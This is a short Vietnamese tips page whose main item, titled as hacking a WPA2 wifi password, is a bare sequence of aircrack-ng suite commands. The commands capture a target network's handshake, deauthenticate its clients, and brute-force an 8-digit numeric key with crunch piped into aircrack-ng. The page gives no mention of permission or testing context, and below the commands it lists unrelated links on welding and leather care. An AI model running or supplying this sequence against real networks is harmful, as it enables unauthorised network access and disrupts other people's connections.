Mẹo Vặt

Hack mật khẩu wifi WPA2
Sử dụng các lệnh sau
iwconfig

airmon-ng start wlan0

airodump-ng wlan0mon

airodump-ng -c 9 -w tenfilecap –bssid XXXXXXX wlan0mon

aireplay-ng -0 0 -a XXXXXXX wlan0mon

crunch 8 8 1234567890 -t %%%%%%%% | aircrack-ng -w- tenfilecap-01.cap –bssid XXXXXXX

airmon-ng stop wlan0mon

Nguồn: https://quanchayngon.com

Xem thêm bài viết khác: https://quanchayngon.com/meo-vat/

Mẹo Vặt
cơ bản về hàn cắt gió đá – các nguyên tắc an toàn cơ bản
Mẹo Vặt
Hướng dẫn hàn gió đá Cho các bạn mới .( Guide welding stone wind )
Mẹo Vặt
Cách giặt áo da thật – Tập 2 Vệ sinh lót – FTT leather